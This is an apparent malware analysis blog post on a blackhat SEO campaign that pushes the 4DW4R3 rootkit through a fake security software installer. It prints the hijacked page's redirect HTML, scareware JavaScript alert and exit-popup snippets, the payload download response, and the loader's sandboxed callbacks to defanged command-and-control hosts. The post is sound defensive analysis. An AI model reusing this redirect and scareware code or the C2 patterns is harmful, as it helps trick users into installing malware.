BlackHat SEO Attacks Redirect to 4DW4R3 Rootkit

We have analyzed a new blackhat seo attack these days and we have noticed that now the main target of these attacks are not anymore the spread of rogue security software, but instead they try to spread the dangerous 4DW4R3 rootkit, and then with this rootkit they may install, in future, a new rogue security software in the victim’s computer.

Below there is a small analysis of the network traffic we have captured during the analysis of these new blackhat seo attacks. The targets of the attacks are mostly keywords related to iphone, episodes of cartoons and world cup 2010 matches.

Hijacked URL:

traseusa .com/images/page.php?r=keyword

Response:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://portalkey .org/?affid=415&subid=landing">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://portalkey .org/?affid=415&subid=landing";
</script>
<a href="hxxp://portalkey .org/?affid=415&subid=landing">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

portalkey .org – 91.212.127.96

The domain portalkey .org is used to display to the user fake security alerts and false system scan reports showing the system is completely infected by trojans:

By analyzing the source of the HTML page, we can see that it uses javascript to display the fake alerts and the fake system scan reports, as example we have extracted few lines of code from the infected page:

{ 		
	alert(this.___("Windows Security Center recommends you to install System Security Antivirus."));
	t.MyConfirm(); 	
}

ExitPopupMessage():

ExitPopupMessage : function()
{ 	
	alert(	this.___("Your computer remains infected by viruses!") + 
	this.___("They can cause data loss and file damages and need to be cured as soon as possible.") + "\n\n" +
	this.___("Return to System Security and download it secure to your PC")); 
}

In particular, the above code will be executed everytime you try to close Internet Explorer and it will force the user to open again the infected page with the Internet Explorer web browser even if the user clicks on “Cancel” button! This can be called like a persistence code that has the main intent to make sure the user will click, before or then, in the malicious page to download the rootkit executable.

clicksmell .org/x92s/uc12vx04/xdtldil.php?id=369

Domain & IP Analysis:

clicksmell .org – 91.188.59.220

And now it is requested to download the 4dw4r3 executable:

portalkey .org/dl.php?f=XXX&subid=1

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/octet-stream
Pragma: hack
Content-Length: 11776
Content-Disposition: attachment; filename=WinSecurityInstaller.exe
Content-Transfer-Encoding: binary

Note that the executable file is named as an executable of a rogue security software “WinSecurityInstaller.exe” but in real it will install the rootkit 4DW4R3…

Cookies:

Cookie: NOT_UNIQUE=1; USER_DATA=XXX; TEMPLATE=XXX; affid=409; subid=landing

We have executed the rootkit loader in our sandbox:

Network activity:

GET /a/ad HTTP/1.1
Host: www.searchannoying .org
 
GET /any3/5-direct.ex HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org
 
POST /css/pragma/knock.php HTTP/1.1
Host: analitycsdead .com
 
GET /css/pragma/crcmds/main HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/srcr.dat HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crcmds/install HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/serf HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/bbr HTTP/1.0
Host: analitycsdead .com
 
GET /readdatagateway.php?type=stats&affid=415&subid=landing&version=4.0&adwareok HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org

Domain & IP Analysis:

searchannoying .org – 91.212.127.96
analitycsdead .com – 62.122.73.242

Files in Temp Directory:

After few hours, has popped up this new window:

Surprise ? No… It is a rogue security software installer…